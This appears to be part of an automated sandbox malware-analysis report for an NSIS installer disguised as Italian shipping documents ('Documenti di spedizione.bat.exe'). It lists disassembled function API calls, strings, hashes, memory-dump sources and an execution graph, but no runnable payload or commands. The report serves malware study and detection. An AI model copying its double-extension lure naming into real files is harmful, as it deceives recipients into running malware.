                                                  • Instruction Fuzzy Hash: C4F01C732161387FD62026A79C4CDEBBEACEF8B3F5B210215F62C9219086615C11D7F5
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 7ad168aabce29fd4aea1c4775643c0a159d1592a8197a50a1d283e8c160106aa
                                                  • Instruction ID: 990765c93fade27e2bb35c4ad61bbd9c2d50a24465aba9d794b4eebee5297a47
                                                  • Opcode Fuzzy Hash: 7ad168aabce29fd4aea1c4775643c0a159d1592a8197a50a1d283e8c160106aa
                                                  • Instruction Fuzzy Hash: 30217E7191421AAEEB05AFA4D94AAFE7BB0EF44304F10453EF505B61D0D7B88941DB98
                                                  APIs
                                                    • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00000400,004037D7,Civilisere Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                    • Part of subcall function 0040601C: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,?,00406090,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,C:\Users\user\AppData\Local\Temp\nso28B6.tmp, 4#v.#v,?,76232EE0,00405DCE,?,76233420,76232EE0,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe"), ref: 0040602A
                                                    • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                    • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nso28B6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,C:\Users\user\AppData\Local\Temp\nso28B6.tmp, 4#v.#v,?,76232EE0,00405DCE,?,76233420,76232EE0,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe"), ref: 004060D2
                                                  • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nso28B6.tmp,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,C:\Users\user\AppData\Local\Temp\nso28B6.tmp, 4#v.#v,?,76232EE0,00405DCE,?,76233420,76232EE0), ref: 004060E2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: 4#v.#v$C:\Users\user\AppData\Local\Temp\nso28B6.tmp
                                                  • API String ID: 3248276644-2007188734
                                                  • Opcode ID: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                  • Instruction ID: 57cdea5284265d05e194d97f438d60f20e9a33b3e1b8f85ab2b18f32e1c9dba5
                                                  • Opcode Fuzzy Hash: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                  • Instruction Fuzzy Hash: F6F04425184A6259E622B73A0C05AAF25098F82324B4B463FF803B22C1DF3D8963917E
                                                  APIs
                                                  • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,?,00406090,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,C:\Users\user\AppData\Local\Temp\nso28B6.tmp, 4#v.#v,?,76232EE0,00405DCE,?,76233420,76232EE0,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe"), ref: 0040602A
                                                  • CharNextW.USER32(00000000), ref: 0040602F
                                                  • CharNextW.USER32(00000000), ref: 00406047
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nso28B6.tmp, xrefs: 0040601D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: CharNext
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nso28B6.tmp
                                                  • API String ID: 3213498283-3993855157
                                                  • Opcode ID: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
                                                  • Instruction ID: 37941c8e81507efb3cd3a011d4506580e18aa69eefbcae33377864b38d05d7c2
                                                  • Opcode Fuzzy Hash: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
                                                  • Instruction Fuzzy Hash: 83F0F061D8061199DA31F6584C40E7766BCEB54360B06803BEA02B32C1D7BC88E182DA
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403652,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 00405F77
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403652,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 00405F81
                                                  • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405F93
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F71
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3936084776
                                                  • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                  • Instruction ID: 335bc096d8d08ccdb4617666140afd44cda2f442d884a3fcf06d2b2a94fa9456
                                                  • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                  • Instruction Fuzzy Hash: 42D0A731101A34EAC2117B448C04CDF629C9F46344341483BF101B31A1CB7D5DA287FD
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 73D81171
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 73D811E3
                                                  • GlobalFree.KERNEL32 ref: 73D8124A
                                                  • GlobalFree.KERNEL32(?), ref: 73D8129B
                                                  • GlobalFree.KERNEL32(00000000), ref: 73D812B1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2754469165.0000000073D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 73D80000, based on PE: true
                                                  • Associated: 00000000.00000002.2753818118.0000000073D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2755665306.0000000073D84000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2756655131.0000000073D86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73d80000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: c6d9c2a1b5b5103b2016588dc93e927a2c5505a01ccd55a20c7caddc7b4b947b
                                                  • Instruction ID: 2106a9180c5cba83b93c719803df15f86dcb3faf7a30de53d2f20eeb88a64329
                                                  • Opcode Fuzzy Hash: c6d9c2a1b5b5103b2016588dc93e927a2c5505a01ccd55a20c7caddc7b4b947b
                                                  • Instruction Fuzzy Hash: 6D51ACB7910302DFE700DF69C845BE677B9FB05724B244119F94AEB250E735BA28CB64
                                                  APIs
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso28B6.tmp\System.dll), ref: 004026BA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nso28B6.tmp$C:\Users\user\AppData\Local\Temp\nso28B6.tmp\System.dll
                                                  • API String ID: 1659193697-3053237756
                                                  • Opcode ID: 0b41287631d18e2d28a56846eef1e8605d4441d913272003cd6f8d0be4e33a07
                                                  • Instruction ID: 3a980f7409dbeac528cd7030d6b505637954cb723df09773b9ac7431f40d283a
                                                  • Opcode Fuzzy Hash: 0b41287631d18e2d28a56846eef1e8605d4441d913272003cd6f8d0be4e33a07
                                                  • Instruction Fuzzy Hash: BD11EB72B00206A7CB00BBB18E4AA9E77659F50758F21443FF502B61D0DAFD8991635E
                                                  APIs
                                                  • CloseHandle.KERNEL32(000002DC,C:\Users\user\AppData\Local\Temp\,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C94
                                                  • CloseHandle.KERNEL32(000002C0,C:\Users\user\AppData\Local\Temp\,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403CA8
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C87
                                                  • C:\Users\user\AppData\Local\Temp\nso28B6.tmp, xrefs: 00403CB8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nso28B6.tmp
                                                  • API String ID: 2962429428-363343014
                                                  • Opcode ID: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
                                                  • Instruction ID: 6bfdaf564fb6f4d857381f61ee43f4b3e7b9b57b480fcef53b70eb5bee5fd527
                                                  • Opcode Fuzzy Hash: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
                                                  • Instruction Fuzzy Hash: ADE0863150471896D5346F7CAF4D9853B185F413357258327F078F20F0C738D95A5AAD
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 004056CA
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 0040571B
                                                    • Part of subcall function 0040466D: SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0040467F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                  • Instruction ID: a38bd53333deb2965cf6bcfe27cab5e967b0379a0e7dc5bd4266cb97908be95f
                                                  • Opcode Fuzzy Hash: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                  • Instruction Fuzzy Hash: A901B131200708EFDB204F90DEC0A9B3665FB84750F504036F605761D1D77A8C92AE2D
                                                  APIs
                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00421F28,?,00000800,00000000,?,00421F28,?,?,Call,?,00000000,004067E1,80000002), ref: 004065B6
                                                  • RegCloseKey.ADVAPI32(?), ref: 004065C1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: Call
                                                  • API String ID: 3356406503-1824292864
                                                  • Opcode ID: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                  • Instruction ID: 4169300ffd031f607b120f1368fde5344542a6b636238975c7224480bb0190f2
                                                  • Opcode Fuzzy Hash: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                  • Instruction Fuzzy Hash: 93017C72500209BBDF218F55DC09EDB3BA8EB54364F01803AFD1AA2190E778D964DBA4
                                                  APIs
                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403161,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Documenti di spedizione.bat.exe,C:\Users\user\Desktop\Documenti di spedizione.bat.exe,80000000,00000003), ref: 00405FC3
                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00403161,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Documenti di spedizione.bat.exe,C:\Users\user\Desktop\Documenti di spedizione.bat.exe,80000000,00000003), ref: 00405FD3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3125694417
                                                  • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                  • Instruction ID: 38d9290afe44bb03d7cf08b54fe4d5b58535dca9612c3dc8604b8734ddeb262b
                                                  • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                  • Instruction Fuzzy Hash: 3AD05EB2411921DAD3126704DD01D9F77ACEF12300746482AE440A7161D7785C8186AC
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040611F
                                                  • CharNextA.USER32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406130
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                  • Instruction ID: 5f3436636367d0d5bc92f6b0e419d408aad35ecbe6557c54d873c5627a92c34c
                                                  • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                  • Instruction Fuzzy Hash: E4F0BB35604414FFC702DFA5DD00D9EBBA8EF46350B2640B9F841FB211D674DE129B99

                                                  Execution Graph

                                                  Execution Coverage:8.9%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:100
                                                  Total number of Limit Nodes:11
                                                  execution_graph 39891 36810040 39892 36810082 39891->39892 39894 36810089 39891->39894 39893 368100da CallWindowProcW 39892->39893 39892->39894 39893->39894 39985 36433210 39986 36433256 GetCurrentProcess 39985->39986 39988 364332a1 39986->39988 39989 364332a8 GetCurrentThread 39986->39989 39988->39989 39990 364332e5 GetCurrentProcess 39989->39990 39991 364332de 39989->39991 39992 3643331b 39990->39992 39991->39990 39993 36433343 GetCurrentThreadId 39992->39993 39994 36433374 39993->39994 39895 d0848 39896 d084e 39895->39896 39897 d091b 39896->39897 39901 d1342 39896->39901 39905 364320f8 39896->39905 39909 36432108 39896->39909 39902 d134b 39901->39902 39903 d1440 39902->39903 39913 d7e71 39902->39913 39903->39896 39906 36432108 39905->39906 39921 36431824 39906->39921 39910 36432117 39909->39910 39911 36431824 2 API calls 39910->39911 39912 36432138 39911->39912 39912->39896 39915 d7e7b 39913->39915 39914 d7f31 39914->39902 39915->39914 39917 3644fa28 39915->39917 39918 3644fa3d 39917->39918 39919 3644fc52 39918->39919 39920 3644fc68 GlobalMemoryStatusEx GlobalMemoryStatusEx 39918->39920 39919->39914 39920->39918 39922 3643182f 39921->39922 39925 36432f94 39922->39925 39924 36433abe 39924->39924 39926 36432f9f 39925->39926 39927 364341e4 39926->39927 39931 36435a00 39926->39931 39936 36435968 39926->39936 39940 36435a68 39926->39940 39927->39924 39932 36435a3a 39931->39932 39934 36435a04 39931->39934 39932->39927 39933 36435a10 39933->39927 39934->39933 39944 36435c18 39934->39944 39937 364359a2 39936->39937 39938 3643596c 39936->39938 39937->39938 39939 36435c18 2 API calls 39937->39939 39938->39927 39939->39938 39941 36435a7a 39940->39941 39942 36435aad 39941->39942 39943 36435c18 2 API calls 39941->39943 39942->39927 39943->39942 39945 36435c25 39944->39945 39946 36435c5e 39945->39946 39948 36433fa4 39945->39948 39946->39933 39949 36433faf 39948->39949 39951 364360d0 39949->39951 39952 36433fb4 39949->39952 39951->39946 39953 36433fbf 39952->39953 39958 36435c94 39953->39958 39955 3643613f 39962 3643b448 39955->39962 39956 36436179 39956->39951 39959 36435c9f 39958->39959 39960 364373c8 39959->39960 39961 36435a68 2 API calls 39959->39961 39960->39955 39961->39960 39963 3643b458 39962->39963 39964 3643b4dd 39963->39964 39965 3643b49d 39963->39965 39966 3643b448 2 API calls 39963->39966 39969 3643c757 39964->39969 39973 3643c768 39964->39973 39965->39956 39966->39964 39971 3643c760 39969->39971 39970 3643c842 39970->39970 39971->39970 39977 3643d690 39971->39977 39974 3643c793 39973->39974 39975 3643c842 39974->39975 39976 3643d690 2 API calls 39974->39976 39976->39975 39978 3643d694 39977->39978 39979 3643d6bc 39978->39979 39983 3643d690 CreateWindowExW 39978->39983 39984 3643d7f0 CreateWindowExW 39978->39984 39979->39970 39980 3643d7d5 39980->39970 39981 3643d8b3 CreateWindowExW 39980->39981 39982 3643d914 39981->39982 39982->39982 39983->39980 39984->39980 39995 368121f8 39996 36812500 39995->39996 39998 36812220 39995->39998 39997 36812229 39998->39997 40003 36811764 